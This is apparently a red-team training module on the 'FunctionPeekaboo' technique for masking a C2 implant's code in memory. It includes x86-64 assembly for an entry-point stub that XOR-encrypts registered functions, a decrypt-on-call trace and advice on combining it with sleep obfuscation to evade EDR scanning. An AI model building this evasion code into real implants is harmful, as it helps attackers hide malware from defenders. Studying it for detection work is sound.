Module 7: Initialization & Runtime Flow
From binary load to encrypted-at-rest — tracing the complete execution flow from startup through function calls.
Module Objective
Trace the complete runtime lifecycle of a FunctionPeekaboo-instrumented binary: the .stub entry point hijack, initial encryption of all registered functions, the transition to normal program execution, and the steady-state flow of decrypt-on-call and re-encrypt-on-return during operation.
1. The Boot Sequence
When the Windows loader executes the binary, the normal startup sequence is hijacked by FunctionPeekaboo. Here is the complete sequence from process creation to steady-state operation:
Boot Sequence
Maps PE sections
Resolves imports
Encrypt all funcs
Setup TEB
CRT startup
mainCRTStartup()
Application code
Self-masking active
| Step | What Happens | State of Registered Functions |
|---|---|---|
| 1. PE Loading | Windows maps the executable into memory, resolves imports, processes relocations | Cleartext (as compiled) |
| 2. Entry Point | Windows calls AddressOfEntryPoint, which points to .stub (set by modifyEP.py) | Cleartext |
| 3. .stub Init | The stub walks .funcmeta and XOR-encrypts every registered function body | Transitioning to encrypted |
| 4. TEB Setup | The stub initializes TEB UserReserved fields to zero (no active function) | All encrypted |
| 5. Jump to Original EP | The stub jumps to the original entry point (saved during post-processing) | All encrypted |
| 6. CRT Initialization | mainCRTStartup runs: initializes heap, stdio, runs static constructors | All encrypted (CRT functions are not registered) |
| 7. main() Entry | Application code begins executing | All encrypted (self-masking active) |
2. The .stub Initialization Code
The .stub section contains the initialization routine. Its job is to encrypt all registered functions before any application code runs:
x86-64 Assemblysection .stub
_peekaboo_init:
; === Prologue: save all registers ===
pushfq
push rax
push rbx
push rcx
push rdx
push rsi
push rdi
push r8
push r9
push r10
push r11
; === Initialize TEB UserReserved fields ===
xor eax, eax
mov qword ptr gs:[0x1478], rax ; UserReserved[0] = NULL
mov qword ptr gs:[0x1480], rax ; UserReserved[1] = 0
mov qword ptr gs:[0x1488], rax ; UserReserved[2] = 0
; === Find image base ===
call .Lgetip
.Lgetip:
pop rbx ; RBX = our address
and rbx, 0xFFFFFFFFFFFF0000 ; Align to 64KB
.Lscan:
cmp word ptr [rbx], 0x5A4D ; "MZ"?
je .Lfound
sub rbx, 0x10000
jmp .Lscan
.Lfound:
; RBX = ImageBase
; === Find .funcmeta section ===
mov ecx, [rbx + 0x3C] ; e_lfanew
lea rdx, [rbx + rcx] ; PE header
movzx ecx, word ptr [rdx + 6] ; NumberOfSections
movzx r8d, word ptr [rdx + 20] ; SizeOfOptionalHeader
lea rsi, [rdx + 24 + r8] ; First section header
.Lsec_loop:
cmp dword ptr [rsi], 0x6E75662E ; ".fun"
jne .Lsec_next
cmp dword ptr [rsi+4], 0x74656D63 ; "cmet"
je .Lsec_found
.Lsec_next:
add rsi, 40
dec ecx
jnz .Lsec_loop
jmp .Ldone ; .funcmeta not found, skip
.Lsec_found:
mov ecx, [rsi + 12] ; .funcmeta VirtualAddress
lea rsi, [rbx + rcx] ; RSI = .funcmeta data
; === Iterate entries and encrypt each function ===
.Lentry_loop:
mov edi, [rsi] ; FunctionRVA
test edi, edi
jz .Ldone ; NULL terminator = end
mov ecx, [rsi + 4] ; FunctionSize
movzx eax, byte ptr [rsi + 8] ; XorKey
; Calculate function VA
lea rdi, [rbx + rdi] ; RDI = function body address
; VirtualProtect to RW
sub rsp, 40 ; Shadow space + oldProtect
lea r9, [rsp + 32] ; &oldProtect
mov r8d, 0x04 ; PAGE_READWRITE
mov edx, ecx ; Size
mov rcx, rdi ; Address
call [VirtualProtect_IAT]
add rsp, 40
; XOR encrypt the function body
mov ecx, [rsi + 4] ; Reload size
movzx eax, byte ptr [rsi + 8] ; Reload key
.Lxor:
xor byte ptr [rdi], al
inc rdi
dec ecx
jnz .Lxor
; Reload function address for VirtualProtect restore
mov edi, [rsi]
lea rdi, [rbx + rdi]
; VirtualProtect back to RX
sub rsp, 40
lea r9, [rsp + 32]
mov r8d, 0x20 ; PAGE_EXECUTE_READ
mov edx, [rsi + 4]
mov rcx, rdi
call [VirtualProtect_IAT]
add rsp, 40
; Mark as encrypted
mov byte ptr [rsi + 9], 1
; Next entry
add rsi, 12
jmp .Lentry_loop
.Ldone:
; === Restore all registers ===
pop r11
pop r10
pop r9
pop r8
pop rdi
pop rsi
pop rdx
pop rcx
pop rbx
pop rax
popfq
; === Jump to original entry point ===
jmp ORIGINAL_ENTRY_POINT ; Patched by modifyEP.py
Timing Window
Between PE loading (step 1) and .stub initialization (step 3), the functions are briefly in cleartext. This window is extremely short (microseconds), occurring before any user-mode code in the process runs. An EDR would need a very aggressive injection-time scan to catch this window. Once initialization completes, functions remain encrypted until explicitly called.
3. Steady-State Runtime Flow
After initialization, the self-masking system operates transparently during normal program execution. Here is a detailed trace of what happens when a peekaboo function is called:
TextCaller code: call beacon_checkin
Time 0: beacon_checkin body is ENCRYPTED (XOR'd garbage bytes)
Time 1: Prologue stub executes:
- CALL/POP gets current address
- Pushes all registers + flags
- Calls handler(func_ptr, DECRYPT)
Time 2: Handler executes:
- Finds PE image base
- Parses .funcmeta, finds beacon_checkin entry
- VirtualProtect(body, size, PAGE_READWRITE)
- XOR decrypts body bytes
- VirtualProtect(body, size, PAGE_EXECUTE_READ)
- Sets IsEncrypted = 0
- Stores func_ptr in TEB UserReserved[0]
Time 3: Prologue stub continues:
- Pops all registers + flags
- Falls through to now-decrypted function body
Time 4: beacon_checkin body executes NORMALLY
(all original instructions run as compiled)
Time 5: beacon_checkin reaches a RET instruction
Epilogue stub executes:
- Pushes all registers + flags
- Calls handler(func_ptr, ENCRYPT)
Time 6: Handler executes:
- VirtualProtect(body, size, PAGE_READWRITE)
- XOR encrypts body bytes
- VirtualProtect(body, size, PAGE_EXECUTE_READ)
- Sets IsEncrypted = 1
- Clears TEB UserReserved[0]
Time 7: Epilogue stub continues:
- Pops all registers + flags
- Executes RET (returns to caller)
Time 8: beacon_checkin body is ENCRYPTED again
4. Function Call Chains
Real programs involve deep call chains. Here is how FunctionPeekaboo handles nested calls between instrumented functions:
Nested Call Example
Textmain() calls func_A() calls func_B() calls func_C()
(only func_A and func_C are peekaboo-registered)
Step 1: main calls func_A
- func_A prologue: DECRYPT func_A
- State: func_A=clear, func_B=N/A, func_C=encrypted
Step 2: func_A calls func_B (NOT registered)
- No prologue/epilogue stubs
- func_B runs normally
- State: func_A=clear, func_C=encrypted
Step 3: func_B calls func_C
- func_C prologue: DECRYPT func_C
- State: func_A=clear, func_C=clear (2 decrypted)
Step 4: func_C returns to func_B
- func_C epilogue: ENCRYPT func_C
- State: func_A=clear, func_C=encrypted
Step 5: func_B returns to func_A
- No epilogue (func_B not registered)
- State: func_A=clear, func_C=encrypted
Step 6: func_A returns to main
- func_A epilogue: ENCRYPT func_A
- State: all encrypted
5. Thread Safety
In a multithreaded implant, different threads may call different peekaboo functions simultaneously. The handler must be thread-safe:
| Concern | How FunctionPeekaboo Handles It |
|---|---|
| TEB state | Per-thread (each thread has its own TEB via GS), no shared state for tracking |
| .funcmeta writes | The IsEncrypted flag is a single byte, and byte writes are atomic on x86. However, two threads calling the same function simultaneously is a race condition |
| Same function, two threads | If thread A decrypts func_X and thread B also needs func_X, thread B sees it already decrypted (IsEncrypted=0) and skips decryption. But if thread A re-encrypts while B is still executing, corruption occurs |
| VirtualProtect | Affects the entire process (memory permissions are per-page, not per-thread). Changes by one thread are visible to all |
The Thread Race Problem
The most critical thread safety issue: if two threads call the same peekaboo function, thread A might re-encrypt it (on return) while thread B is still executing it. The simplest mitigation is a reference counter per function in .funcmeta — only re-encrypt when the counter reaches zero. The PoC may not fully address this; production implementations like Nighthawk use more sophisticated synchronization.
6. Exception Handling Considerations
If a peekaboo function throws an exception (C++ exception, SEH, or hardware exception), the normal return path is bypassed. The epilogue stub never runs, leaving the function decrypted:
Exception Scenarios
| Exception Type | Impact | Mitigation |
|---|---|---|
| C++ throw | Stack unwinding skips the epilogue stub | Register an SEH handler in the prologue that re-encrypts on unwind |
| SEH exception | If caught by a handler in a parent frame, epilogue is skipped | Use __finally blocks or custom unwind handlers |
| Access violation | Process may terminate; re-encryption irrelevant | None needed (process is dying) |
| VEH handler | Vectored exception handler might resume execution; function stays decrypted | VEH handler should check TEB state and re-encrypt if needed |
The PoC FunctionPeekaboo focuses on the happy path. A production implementation would register unwind handlers to ensure re-encryption even on exceptional control flow paths.
7. Integration with Sleep Obfuscation
FunctionPeekaboo and sleep obfuscation can be combined for maximum coverage:
TextCombined Protection Timeline:
Active Phase (checking in, executing commands):
FunctionPeekaboo: ~98% of code encrypted (only active function decrypted)
Sleep obfuscation: not active (implant is awake)
Net coverage: ~98%
Sleep Phase (waiting between check-ins):
FunctionPeekaboo: 100% encrypted (no function executing)
Sleep obfuscation: 100% encrypted (entire image masked)
Net coverage: 100% (double encrypted)
Result: At no point is more than ~2% of code in cleartext
Layered Defense
Using both techniques together means the implant has strong protection in both active and passive states. Sleep obfuscation handles the sleep window, and FunctionPeekaboo handles the active window. The ~2% gap during active execution represents only the single function currently running — a very small signature surface for any scanner to catch.
8. Debugging FunctionPeekaboo Binaries
Debugging is more complex because function bodies are encrypted at rest. When you set a breakpoint in a debugger, the breakpoint address might contain encrypted garbage:
Debugging Tips
- Break on the prologue stub: Set breakpoints at function entry (before the first instruction of the stub). The stub is never encrypted — only the body is.
- Break after decryption: Set a breakpoint on the handler’s return. At that point, the function body is decrypted and you can inspect it normally.
- Disable masking for debugging: Remove the
peekabooattribute from the function you want to debug, recompile. - Single-step through stubs: Use single-stepping (F11/step-into) through the prologue to watch the decryption happen in real-time.
- Inspect .funcmeta: Dump the
.funcmetasection to see which functions are registered and their current encryption state.
9. Performance Profiling
| Operation | Typical Latency | Notes |
|---|---|---|
| Prologue stub (register save) | ~10ns | Push instructions, fast |
| Handler: PE parsing | ~50ns | Memory reads, cached after first call |
| Handler: .funcmeta lookup | ~20ns | Linear scan, typically <20 entries |
| Handler: VirtualProtect (RX→RW) | ~1-5μs | System call, dominates total time |
| Handler: XOR loop (1KB function) | ~100ns | Fast, memory-bound |
| Handler: VirtualProtect (RW→RX) | ~1-5μs | Second system call |
| Epilogue stub (register restore) | ~10ns | Pop instructions, fast |
| Total per call+return | ~4-20μs | Dominated by VirtualProtect syscalls |
For a C2 beacon that checks in every 60 seconds, a 20μs overhead per function call is completely negligible. Even with dozens of peekaboo functions called per check-in cycle, the total overhead is under 1ms — invisible to the user and the C2 framework.
Knowledge Check
Q1: When are all registered functions first encrypted?
Q2: What is the main thread safety risk with FunctionPeekaboo?
Q3: What dominates the per-function-call performance overhead?